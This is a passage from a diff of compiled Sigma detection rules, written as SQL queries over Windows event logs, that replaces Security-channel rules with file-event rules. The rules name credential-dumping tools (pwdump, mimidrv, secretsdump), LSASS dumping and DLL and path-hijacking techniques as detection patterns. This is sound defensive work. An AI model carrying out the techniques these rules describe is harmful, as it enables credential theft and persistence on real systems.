'%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Defrag Deactivation - Security", - "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", - "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "status": "experimental", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1053", - "attack.s0111" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" ], - "filename": "win_security_apt_slingshot.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "title": "Creation Of Non-Existent System DLL", + "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", "tags": [ - "attack.execution", - "attack.privilege_escalation", + "attack.defense_evasion", "attack.persistence", - "attack.t1053.005" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_create_non_existent_dlls.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", - "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "status": "experimental", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Pass the Hash Activity 2", - "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "status": "stable", - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", + "id": "15904280-565c-4b73-9303-3291f964e7f9", + "status": "experimental", + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1550.002" + "attack.persistence" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\'" ], - "filename": "win_security_pass_the_hash_2.yml" + "filename": "file_event_win_persistence_error_handler_cmd.yml" }, { - "title": "Azure AD Health Service Agents Registry Keys Access", - "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", - "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "VsCode Powershell Profile Modification", + "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", + "status": "experimental", + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unknown" + "Legitimate use of the profile by developers or administrators" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\'" ], - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" + "filename": "file_event_win_susp_vscode_powershell_profile.yml" }, { - "title": "Access Token Abuse", - "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", - "status": "experimental", - "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "author": "Michaela Adams, Zach Mathis", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "status": "test", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Anti-Virus" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_access_token_abuse.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ "attack.credential_access", - "car.2019-04-004", "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "Addition of Domain Trusts", - "id": "0255a820-e564-4e40-af2b-6ac61160335c", - "status": "stable", - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "author": "Thomas Patzke", + "title": "Office Macro File Creation", + "id": "91174a41-dc8f-401b-be89-7bfc140612a0", + "status": "experimental", + "description": "Detects the creation of a new office macro files on the systems", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate extension of domain structure" + "Very common in environments that rely heavily on macro documents" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\')" ], - "filename": "win_security_susp_add_domain_trust.yml" + "filename": "file_event_win_office_macro_files_created.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "status": "experimental", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "cve.2021.44077" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Tap Driver Installation - Security", - "id": "9c8afa4d-0022-48f0-9456-3712466f9701", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "status": "experimental", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Administrative activity", + "PowerShell scripts running as SYSTEM user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" ], - "filename": "win_security_tap_driver_installation.yml" + "filename": "file_event_win_susp_system_interactive_powershell.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "cve.2021.42278", - "cve.2021.42287", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Admin User Remote Logon", - "id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect remote login by Administrator user (depending on internal pattern).", - "author": "juju4", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1078.001", - "attack.t1078.002", - "attack.t1078.003", - "car.2016-04-005" + "attack.persistence", + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "Legitimate administrative activity." + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND AuthenticationPackageName = 'Negotiate' AND TargetUserName LIKE 'Admin%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_admin_rdp_login.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Suspicious PROCEXP152.sys File Created In TMP", + "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "status": "test", + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe%' ESCAPE 